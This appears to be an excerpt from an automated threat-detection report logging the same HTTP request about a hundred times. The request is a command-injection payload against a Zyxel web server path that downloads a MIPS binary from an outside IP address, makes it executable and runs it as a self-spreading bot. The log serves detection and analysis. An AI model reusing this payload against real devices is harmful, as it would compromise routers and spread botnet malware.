            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
